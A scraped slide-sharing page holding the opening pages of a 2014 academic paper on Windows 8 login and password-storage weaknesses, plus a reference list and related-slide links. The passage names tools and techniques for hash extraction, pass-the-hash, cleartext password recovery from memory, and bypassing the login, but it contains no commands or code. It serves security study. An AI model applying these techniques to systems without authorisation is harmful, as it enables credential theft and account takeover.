Lowe, M. 2013. New r̈estricted adminf̈eature of rdp 8.1 allows pass-the-hash.
https://labs.portcullis.co.uk/blog/new-restricted-admin-feature-of-rdp-8-1-allows-pass-the-
hash/. Accessed : 18.feb.2014.
Maartmann-Moe, C. 2011. Inception. http://www.breaknenter.org/projects/inception/. Ac-
cessed : 18.feb.2014.
McClure, S., Scambray, J., Kurtz, G., and Kurtz. 2009. Hacking exposed: network security
secrets and solutions. McGraw-Hill.
Microsoft. 2013. What’s new in biometrics in windows 8.1.
http://technet.microsoft.com/library/dn344916.aspx. Accessed : 24.jan.2014.
Microsoft. 20xx. Msv1 0 authentication package. http://msdn.microsoft.com/en-
us/library/windows/desktop/aa378753(v=vs.85).aspx. Accessed : 24.feb.2014.
Mythbusters. 2006. Fingerprint scanners are unbeatable. http://www.discovery.com/tv-
shows/mythbusters/mythbusters-database/fingerprint-scanners-unbeatable.htm. Accessed :
18.feb.2014.
Passcape. 2011’. Lsa secrets in windows.
http://www.passcape.com/index.php?setLang=2&section=blog&cmd=details&id=15. Ac-
cessed : 21.feb.2014.
Passcape. 2012a. Dpapi secrets. security analysis and data recovery in dpapi (part
1). http://www.passcape.com/index.php?section=blog&cmd=details&id=20. Accessed :
21.feb.2014.
Passcape. 2012b. Security breach in windows 7 and windows 8 biometric authentica-
tion. http://www.passcape.com/index.php?section=blog&cmd=details&id=31. Accessed :
23.jan.2014.
Passcape. 2012c. Windows 8 stores logon passwords in plain-text.
http://www.passcape.com/index.php?section=blog&cmd=details&id=27. Accessed :
7.jan.2014.
Passcape. 2014. Passcape. http://www.passcape.com. Accessed : 21.feb.2014.
Pilkington, M. 2012. Protecting privileged domain accounts: Disabling encrypted
passwords. http://digital-forensics.sans.org/blog/2012/03/09/protecting-privileged-domain-
accounts-disabling-encrypted-passwords. Accessed : 24.feb.2014.
Rapid7. 2011. Microsoft windows authenticated administration utility.
http://www.rapid7.com/db/modules/auxiliary/admin/smb/psexec command. Accessed :
18.feb.2014.
Ronin. 2014. Passing the hash with remote. http://www.kali.org/penetration-testing/passing-
hash-remote-desktop/. Accessed : 18.feb.2014.
Skullsecurity. 2011. Passwords. https://wiki.skullsecurity.org/Passwords. Accessed :
21.feb.2014.
Vulnerabilities in login authentication methods and password storage in Windows 8 · 17
Spylogic. 2008. What is digest authentication? http://www.spylogic.net/2008/05/winlockpwn-
more-then-a-partytrick/. Accessed : 20.feb.2014.
Superuser. 2012. How to get a screensaver at the windows 7 login screen?
http://superuser.com/questions/107200/how-to-get-a-screensaver-at-the-windows-7-login-
screen. Accessed : 26.feb.2014.
thelead82. 2013. Kon-boot for windows. http://www.thelead82.com/products-win.html. Ac-
cessed : 17.jan.2014.
Wolthusen, S. D. 2014. Lecture slides imt4541 foundations in information security.
xkcd. 2013. Password strength. https://xkcd.com/936/. Accessed : 24.jan.2014.
ZDNet. 2014. The history of windows: A timeline. http://www.zdnet.com/the-history-of-
windows-a-timeline-7000025145/. Accessed : 18.feb.2014.
Zhao, Z., Ahn, G.-J., Seo, J.-J., and Hu, H. 2013. On the security of picture gesture authen-
tication. In Proceedings of the 22nd USENIX conference on Security. USENIX Association,
383–398.

Más contenido relacionado

Similar a Vulnerabilities in login authentication methods and password storage in Windows 8

Operating system presentation
Operating system  presentationOperating system  presentation
Operating system presentationDescon
 
Windows 8 product guide business english
Windows 8 product guide business englishWindows 8 product guide business english
Windows 8 product guide business englishHeo Gòm
 
POS355 Week 5 Individual Essay
POS355 Week 5 Individual EssayPOS355 Week 5 Individual Essay
POS355 Week 5 Individual EssayBrooke Curtis
 
Windows 8 Guide Volume 1
Windows 8 Guide Volume 1Windows 8 Guide Volume 1
Windows 8 Guide Volume 1Imam Dermawan
 
BBA 3551, Information Systems Management Course Learn.docx
BBA 3551, Information Systems Management Course Learn.docxBBA 3551, Information Systems Management Course Learn.docx
BBA 3551, Information Systems Management Course Learn.docxtarifarmarie
 
E Mails From Your Boss And A Man Named Paul Allen
E Mails From Your Boss And A Man Named Paul AllenE Mails From Your Boss And A Man Named Paul Allen
E Mails From Your Boss And A Man Named Paul AllenCrystal Alvarez
 
A Complete guide of Windows 8 with its application
A Complete guide of Windows 8 with its applicationA Complete guide of Windows 8 with its application
A Complete guide of Windows 8 with its applicationalva christi
 
Operating Systems ( Os )
Operating Systems ( Os )Operating Systems ( Os )
Operating Systems ( Os )Amber Wheeler
 
Windows 8
Windows 8Windows 8
Windows 8liguad1
 
Operating System Upgrade Implementation Report And...
Operating System Upgrade Implementation Report And...Operating System Upgrade Implementation Report And...
Operating System Upgrade Implementation Report And...Julie Kwhl
 
Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...
Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...
Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...North Star. Inc.
 

Similar a Vulnerabilities in login authentication methods and password storage in Windows 8 (20)

Operating system presentation
Operating system  presentationOperating system  presentation
Operating system presentation
 
Windows 8
Windows 8Windows 8
Windows 8
 
Windows 8
Windows 8Windows 8
Windows 8
 
Windows 8 product guide business english
Windows 8 product guide business englishWindows 8 product guide business english
Windows 8 product guide business english
 
Windows8 vdt
Windows8 vdtWindows8 vdt
Windows8 vdt
 
Ali Saruhan
Ali SaruhanAli Saruhan
Ali Saruhan
 
OlgerHoxha_Thesis_Final
OlgerHoxha_Thesis_FinalOlgerHoxha_Thesis_Final
OlgerHoxha_Thesis_Final
 
POS355 Week 5 Individual Essay
POS355 Week 5 Individual EssayPOS355 Week 5 Individual Essay
POS355 Week 5 Individual Essay
 
About Windows 8
About Windows 8About Windows 8
About Windows 8
 
Windows 8 Guide Volume 1
Windows 8 Guide Volume 1Windows 8 Guide Volume 1
Windows 8 Guide Volume 1
 
Windows 8 Introduction
Windows 8 IntroductionWindows 8 Introduction
Windows 8 Introduction
 
BBA 3551, Information Systems Management Course Learn.docx
BBA 3551, Information Systems Management Course Learn.docxBBA 3551, Information Systems Management Course Learn.docx
BBA 3551, Information Systems Management Course Learn.docx
 
E Mails From Your Boss And A Man Named Paul Allen
E Mails From Your Boss And A Man Named Paul AllenE Mails From Your Boss And A Man Named Paul Allen
E Mails From Your Boss And A Man Named Paul Allen
 
Windows 8
Windows 8Windows 8
Windows 8
 
A Complete guide of Windows 8 with its application
A Complete guide of Windows 8 with its applicationA Complete guide of Windows 8 with its application
A Complete guide of Windows 8 with its application
 
Windows 8 Enterprise
Windows 8 EnterpriseWindows 8 Enterprise
Windows 8 Enterprise
 
Operating Systems ( Os )
Operating Systems ( Os )Operating Systems ( Os )
Operating Systems ( Os )
 
Windows 8
Windows 8Windows 8
Windows 8
 
Operating System Upgrade Implementation Report And...
Operating System Upgrade Implementation Report And...Operating System Upgrade Implementation Report And...
Operating System Upgrade Implementation Report And...
 
Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...
Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...
Discover the 5 New Windows 8 Security Features You Should Know - by Denver IT...
 

Más de John-André Bjørkhaug

ISF høstkonferanse 2014 - Windows 8 autentisering og passord
ISF høstkonferanse 2014 - Windows 8 autentisering og passordISF høstkonferanse 2014 - Windows 8 autentisering og passord
ISF høstkonferanse 2014 - Windows 8 autentisering og passordJohn-André Bjørkhaug
 
Smart grid networks and security architecture: Threat analysis, threat scenar...
Smart grid networks and security architecture: Threat analysis, threat scenar...Smart grid networks and security architecture: Threat analysis, threat scenar...
Smart grid networks and security architecture: Threat analysis, threat scenar...John-André Bjørkhaug
 
Fighting buffer overflows with Address Space Layout Randomization
Fighting buffer overflows with Address Space Layout RandomizationFighting buffer overflows with Address Space Layout Randomization
Fighting buffer overflows with Address Space Layout RandomizationJohn-André Bjørkhaug
 

Más de John-André Bjørkhaug (6)

(IMSI-)Catch me if you can
(IMSI-)Catch me if you can(IMSI-)Catch me if you can
(IMSI-)Catch me if you can
 
ISF høstkonferanse 2014 - Windows 8 autentisering og passord
ISF høstkonferanse 2014 - Windows 8 autentisering og passordISF høstkonferanse 2014 - Windows 8 autentisering og passord
ISF høstkonferanse 2014 - Windows 8 autentisering og passord
 
Smart grid networks and security architecture: Threat analysis, threat scenar...
Smart grid networks and security architecture: Threat analysis, threat scenar...Smart grid networks and security architecture: Threat analysis, threat scenar...
Smart grid networks and security architecture: Threat analysis, threat scenar...
 
The Hagelin M-209 cipher machine
The Hagelin M-209 cipher machineThe Hagelin M-209 cipher machine
The Hagelin M-209 cipher machine
 
Generating random primes
Generating random primesGenerating random primes
Generating random primes
 
Fighting buffer overflows with Address Space Layout Randomization
Fighting buffer overflows with Address Space Layout RandomizationFighting buffer overflows with Address Space Layout Randomization
Fighting buffer overflows with Address Space Layout Randomization
 

Último

activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfJamie (Taka) Wang
 
100+ ChatGPT Prompts for SEO Optimization
100+ ChatGPT Prompts for SEO Optimization100+ ChatGPT Prompts for SEO Optimization
100+ ChatGPT Prompts for SEO Optimizationarrow10202532yuvraj
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding TeamAdam Moalla
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...Aggregage
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxMatsuo Lab
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-pyJamie (Taka) Wang
 
Valere | Digital Solutions & AI Transformation Portfolio | 2024
Valere | Digital Solutions & AI Transformation Portfolio | 2024Valere | Digital Solutions & AI Transformation Portfolio | 2024
Valere | Digital Solutions & AI Transformation Portfolio | 2024Alexander Turgeon
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
99.99% of Your Traces Are (Probably) Trash (SRECon NA 2024).pdf
99.99% of Your Traces  Are (Probably) Trash (SRECon NA 2024).pdf99.99% of Your Traces  Are (Probably) Trash (SRECon NA 2024).pdf
99.99% of Your Traces Are (Probably) Trash (SRECon NA 2024).pdfPaige Cruz
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Brian Pichman
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...
All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...
All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...Daniel Zivkovic
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1DianaGray10
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsSafe Software
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Websitedgelyza
 

Último (20)

activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
 
100+ ChatGPT Prompts for SEO Optimization
100+ ChatGPT Prompts for SEO Optimization100+ ChatGPT Prompts for SEO Optimization
100+ ChatGPT Prompts for SEO Optimization
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
201610817 - edge part1
201610817 - edge part1201610817 - edge part1
201610817 - edge part1
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-py
 
Valere | Digital Solutions & AI Transformation Portfolio | 2024
Valere | Digital Solutions & AI Transformation Portfolio | 2024Valere | Digital Solutions & AI Transformation Portfolio | 2024
Valere | Digital Solutions & AI Transformation Portfolio | 2024
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
99.99% of Your Traces Are (Probably) Trash (SRECon NA 2024).pdf
99.99% of Your Traces  Are (Probably) Trash (SRECon NA 2024).pdf99.99% of Your Traces  Are (Probably) Trash (SRECon NA 2024).pdf
99.99% of Your Traces Are (Probably) Trash (SRECon NA 2024).pdf
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...
All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...
All in AI: LLM Landscape & RAG in 2024 with Mark Ryan (Google) & Jerry Liu (L...
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Website
 

Vulnerabilities in login authentication methods and password storage in Windows 8

  • 1. Vulnerabilities in login authentication methods and password storage in Windows 8 John-Andre Bjorkhaug Gjovik University College March 2014 Today, with the rise of touchscreen devices, like tablets, smartphones and even laptops with touchscreens, users might find it to cumbersome to type in regular passwords. Typing for example a eight character password containing both regular letters, numbers and even symbols takes too much time and is often not so easy for for the average user, on a touchscreen keyboard. The companies developing these devices have taken the problem under consideration, and have come up with alternative authentication methods replacing the password, for example biometrics, PINs, gestures and so on. This paper will focus on the different methods used for logon authentication in the Microsoft Windows 8 and 8.1 operating system, since this now is appearing on more and more touchscreen devices. This paper starts with an introduction, explaining some of the new features of Windows 8. Then there is an introduction to works that are related to this paper. Following is a section about classic attacks on passwords in Windows, techniques for bypassing login authentication, and how passwords can be extracted in clear-text. Then it is time to dive in to Windows 8, and the new methods for login authentication and their vulnerabilities. The paper ends with a conclusion with some suggestions to techniques that can be used to mitigate some of the vulnerability discussed throughout this paper. Categories and Subject Descriptors: D.4.6 [Security and Protection ]: Invasive software— Operating system security General Terms: security Additional Key Words and Phrases: operating system security, passwords, authentication, PIN 1. INTRODUCTION Today, devices with touchscreens, like smartphones, tablets and laptops, are get- ting more and more usual, and operating systems like Android and iOS have been dominating for some years. Using text-based passwords, containing for example both upper and lower cases, numbers and even symbols takes too much time and is often not so easy for for the average user, using touchscreen softkeyboards. The companies developing these devices have taken the problem under consideration, and have come up with alternative authentication methods replacing the password, for example biometrics, PINs, gestures and so on. PIN codes and the regular ges- ture password used on different touch devices for years, have a very small password space, compared to a good old text-based password. In Windows 8, Microsoft pre- sented some new native methods for logging in to a Windows system, the use of a a four digit PIN code, the so called picture password, and fingerprint. A four digit PIN code, says itself that it is not very secure, a picture password can be very secure, if implemented correctly. Even though Microsoft Windows have been available in different forms on different touch devices for many years, a lot happened when they
  • 2. Vulnerabilities in login authentication methods and password storage in Windows 8 · 2 made Windows 8. This version of Windows runs just as good, on touch devices, and on desktop computers. You have the possibility to use the good old desktop for use on laptops and desktop computers, and the new tile interface called Modern UI 1 which is better fitted for touch devices. Recently there have also been a rise in both laptops and desktop computers with touch screen. Microsoft Windows 8 was released in August 2012, and was available to the general public in the end of October the same year. Windows 8.1 came out in October 2013, with small changes compared to 8 [ZDNet 2014]. Actually, 8.1 can in many ways be looked at like more of a servicepack than a full OS upgrade. Windows 8 can be said to have been of the biggest changes, at least visually, since Windows 95 replaced Windows 3.11, but at least Windows 8 was very Windows 7 like, when not using the new tile interface. Since Windows 8 is relatively new, there is still some children’s diseases, and both the operating system and the users still need to mature a bit. In addition to adding Modern UI for use on devices with a touchscreen, Microsoft also included several authentication methods, to make the operating system even more user friendly on touch device. In addition to the good old password, methods like PIN code and Picture password have been included from Windows 8. The reason for this is so the user don’t have to type in passwords like ”Tr0ub4dor” [xkcd 2013] on the devices’ limited software keyboard, where for example the use of the ”shift” key is rather cumbersome. This new login authentication methods have introduced quite a bit of new vulnerabilities in to the login authentication in Windows, in addition to the once that have been there for years. This paper will discuss both old and new login authentication methods, and their vulnerabilities. All tests performed in this paper have been done on a VMWare Virtual machine and a Dell Venue 11 Pro tablet, both running Windows 8 This paper is organized as follows. Section 1 is the introduction you now are reading. Section 2 gives an introduction to works that are related to this paper. Section 3 is about classic attacks on passwords in Windows, techniques for bypassing login authentication, and how passwords can be extracted in clear-text. Section 4 gives details about the new authentication methods used for logging in Windows 8, and their vulnerabilities. The paper ends with section 5, the conclusion with some suggestions to techniques that can be used to mitigate some of the vulnerability discussed throughout this paper. 2. RELATED WORK Most books covering ethical hacking and penetration testing have a section about extracting and cracking LM and NTLM hashes, for example the ”Hacking Exposed” series [McClure et al. 2009]. The ”new” authentication forms for Windows, picture passwords and PIN code is not so much written about yet seen in context with Windows, but the paper ”On the Security of Picture Gesture Authentication” by Ziming Zhao et.al. [Zhao et al. 2013] describes a rather comprehensive research on picture passwords, describing an empirical analysis of picture gesture authentication from more than 10,000 pictures passwords. This paper focus more on how the login mechanism works together with the rest of the operating system. When it comes to PIN codes, there have been some statistically research done among others by 1Many still call the interface by its earlier name Metro
  • 3. Vulnerabilities in login authentication methods and password storage in Windows 8 · 3 Joseph Bonneau et.al. at the Cambridge University [Bonneau et al. 2012], and the company ”Datagentics” [DataGenetics 2012]. Also, much of the content in this paper is relatively new, and only discussed in blog belonging to the smart guys who find vulnerabilities, and write exploits. Like for example the blog of the Russian company Passcape [Passcape 2014], and the French security researcher Benjamin Delpy aka ”gentilkiwi” [Delpy 2014a]. 3. CLASSICAL LOGIN AUTHENTICATION VULNERABILITIES IN WINDOWS Before going into the vulnerabilities that is new to Windows 8, because of the new login authentication methods, the good old vulnerabilities in the login mechanism and passwords storage, that are still valid for Windows 8.x, will be discussed. Fig. 1. Password login screen in Windows 8.1, with the choice of login method below the input field. 3.1 Password hashing In Microsoft Windows, a cryptographic hash of the password is stored in a file called ”SAM” (Security Accounts Manager), which is stored in %systemroot% system32 config SAM. This file is a part of the registry, and in an officially undocumented binary format [Hagen 2014]. In the Windows registry the SAM is placed under the key HKEY LOCAL MACHINESAM. Both of these locations are locked even for the administrator while the operating system is running, but it is possible to extract the hashes for example from the registry on a running system with the help of DLL-injection into the LSASS (Local Security Authority Subsystem Service) process, with tools like for example pwdump, fgdump, Cain & Abel and mimikatz, which we will discuss more later. Other places to extract hashes from is among others from a shadow copy of the SAM file. Readers which is interested in knowing more about what can be find in the LSASS process, is recommended to read [Passcape 2011]. There are two different hash algorithms, called ( LM) (LAN Manager) and NTLM (NT LAN Manager). From Windows Vista and Server 2008, LM hash have been the default disabled, but can be enabled for backwards compatibility. A LM hash can be used for passwords up to 14 characters, and have a serious vulnerability. The password is split in two halves, the first one seven characters and the second one the rest of the password. For example a password of length 10 is split into one hash calculated from the first seven characters, and one with the last three characters. All letters are then capitalized. This is then cutting a password of 14 characters from 284 to 237 different combinations [McClure et al. 2009]. This makes cracking of LM-hashes very fast, using for example Rainbow tables, which
  • 4. Vulnerabilities in login authentication methods and password storage in Windows 8 · 4 is pre-calculated tables with passwords and hashes. This paper will not go any further into the cracking of LM-hashes, since this is out of scope for the paper. For more information see for example [McClure et al. 2009]. When it comes to NTLM hashes, there is a much bigger keyspace, but Rainbow tables are still a very effective method for cracking these hashes, because there is no salting of the hash. The problem is that with NTLM’s large keyspace, tables get very space consuming. One of the largest publicly available rainbow tables for NTLM today, is a table covering upper and lower cases, the numbers 0-9 and space, for passwords with length 1 to 7 characters. This table is a little over 1TB big. Compared with a rainbow table for LM hash, which covers all symbols on the keyboard, and password length 1 to 7 characters, which in reality means 1-14 since the password is split in two, which is 34GB [Freerainbowtables 2014]. The term salting the hash means that a random value is added to the password before the hash algorithm is run, and by that creating different hashes when the same password is hashed twice. The password hashing mechanism in for example Linux salts its hashes. Salting the hash mitigates attacks like rainbow tables [McClure et al. 2009]. Lately there have also been very popular to use the GPU 2 , on graphic cards to increase the speed of cracking cryptographic hashes. Since these are much more effective on the simple mathematical operations used in hashing than regular CPU’s. According to Jeremy Gosney 3 , one of the worlds top experts in password cracking, with a regular graphic card like the AMD RadeonTM HD 7970, it will will be possible to brute-force NTLM hashes at approximately 20 billion passwords per second. With a cluster of graphic cards, like for this can be multiplied by the number of graphic cards. One down thing with building machines for password cracking with graphic cards is that it gets rather expensive. In February 2014 an AMD RadeonTM HD 7970 costs approximately NOK3000 in Norway. But why build your own password cracking machine, when Amazon EC2 offers multiple graphic cards in their cloud computers, which can be rented for as low as $2 per hour [Amazon 2014]. It is very common to use large dictionaries, to shorten the time to crack a password. Today, when there have a numerous leaks with large password databases, there is no problem for adversaries to create very effective dictionaries. The biggest password leak up till now is the leak of over 32,000,000 user accounts from the game producer RockYou in 2009 [Skullsecurity 2011]. Cracking password hashes can be done for example with tools like the following: —John The Ripper —L0phtCrack —Cain & Abel —Ophcrack —OclHashCat —Tools from ElcomSoft If a computer is compromised, the NTLM hashes are extracted, and the adversary isn’t able to crack the password, the hash can still be useful. The hash can be used 2Graphic Processing Unit 3Twitter conversation between me and him
  • 5. Vulnerabilities in login authentication methods and password storage in Windows 8 · 5 in a so called pass-the-hash attack, where the hash is used for authentication to other systems connected to the same network as the adversary and using same password as the compromised system, inter-system password re-use [Wolthusen 2014]. This can be done with tools like for example mimikatz and modifications of the psexec tool, which is included in the penetration testing framework Metasploit [Rapid7 2011]. This is an very effective attack in a Windows environment where the same administrator password is used on multiple computers, and have been used on numerous penetration tests by the author of this paper, which a very high successful rate. Up until the Windows 8.1 and Windows 2012 R2, it was only possible to run limited resources with the use the pass-the-hash attack, but here Microsoft implemented a security feature in Remote Desktop Protocol (RDP) called Restricted Admin, which actually makes it possible to connect to an RDP service using the pass-the-hash attack [Falde 2013] [Ronin 2014] [Lowe 2013]. As most other attacks on passwords in Windows, this can also be done with mimikatz, but also with a more known and recognized application called FreeRDP, which is an open implementation of the RDP protocol [Ronin 2014]. 3.2 Clear text password extraction In the recent years it have also gotten publicly known that because of feature in Windows called WDigest, it is possible to extract passwords in cleartext from mem- ory, using tools like mimikatz [Delpy 2014b] [Delpy 2011], or Windows Credential Editor [Amplia 2013]. WDigest is a DLL which that was first added in Windows XP, and used to authenticate users against HTTP Digest authentication and Sim- ple Authentication Security Layer exchange. These two authentications methods requires a plain-text password to be able to function. To extract passwords from WDigest, the adversary need to access a computer that is turned on and logged in, but how many average users lock their computer when they go to the toilet? Similar vulnerabilities also apply to other features that was implemented from Windows NT 6 (Windows Vista and Windows Server 2008). Like for example when Single Sign On (SSO) to Remote Desktops is enabled (tspkg) [Delpy 2014d], if a Microsoft Live account (LiveSSP4 ) is used [Delpy 2012], and for the use with Kerberos SSP. Actually in Windows 8.1 wdigest and tspkg is default disabled, but when SSO for websites or RDP is enabled, wdigest and tspkg is too. The password stored in mem- ory for all these scenarios are actually encrypted, but with such a bad method that it is very easy to decrypt it. The standard Windows function LsaProtectMemory is used for encryption, and LsaUnotectMemory for decryption [Pilkington 2012]. More methods for extracting passwords in clear-text will follow, when we later discuss some new vulnerabilities in Windows 8. 3.3 Bypassing login authentication The techniques discussed earlier assumes that the adversary already have access to the victim system, either by being a user of a multiuser system, which want to forge the identify of other users of the same system, or an adversary that have gotten access to a system which is powered on and already logged in. But what if the system is shut down, or locked? Let’s discuss some classical options to bypass the 4Security Support Provider
  • 6. Vulnerabilities in login authentication methods and password storage in Windows 8 · 6 login authentication in Windows. Some of these attacks have been known all the way back to Windows XP, but are still not fixed in Windows 8.1. Password reset Probably the most known and most used Windows login bypass is the use of a bootable media, to edit the SAM file. This trick is very simple, but it can leave easily found traces that an adversary have accessed the system. This trick works by booting the system with another operating system, most often a small Linux distribution and edit the SAM-file, which was discussed earlier. This works like a charm since Windows isn’t running. With tools like for example Offline NT Password and Registry editor developed by Peter Nordahl Hagen [Hagen 2014], it is possible to things like: —Change or clear a users password —Enable disabled accounts —Create new users —Remove users —Change a users group To access a system without leaving any easy to find traces, the adversary could create a new user, add it to the ”admin” group, log in to the system and at the end delete the newly added user. msv1 0.dll patching at boot-time If creating a new user is not desired, patching the DLL file ”msv1.0.dll” can be a nice option. This DLL is called by the Local Security Authority (LSA), which is mentioned earlier, and processes login data collected by the Credential Providers 5 , for the Winlogon process [Microsoft 20xx]. At boot-time, this can be done using tools like Kon-Boot [thelead82 2013]. This application silently bypass the login authentication on any modern Windows operating system, by pathcing msv1 0.dll when it is loaded into memory. The pathching causes the password-check to always return true, which causes all accounts to not require a password, and will overwrite any old passwords. The way this tool is used is to boot the computer from a some kind of external medium, CD, DVD, USB stick etc., a Kon-Boot boot screen will then be displayed while the tool is working. Then, when the Windows login screen is visible, select the one want to log in as, and log in without any password. When the computer then is rebooted, the victim logs in like he have always done, with his good old password. As a site note, it is also available for Apple OS X, but working in a different way. msv1 0.dll patching with Firewire IEEE 1394, commonly known as Firewire, is another interesting case, when it come to bypassing Windows login authentication. The vulnerability with Firewire is that it have direct access to the physical memory addresses, making it possible to patch the msv1 0.dll, just as mention earlier, but this time at run-time. This attack was 5Credential Providers replaced the more known GINA from Windows Vista [Griffin 2007]
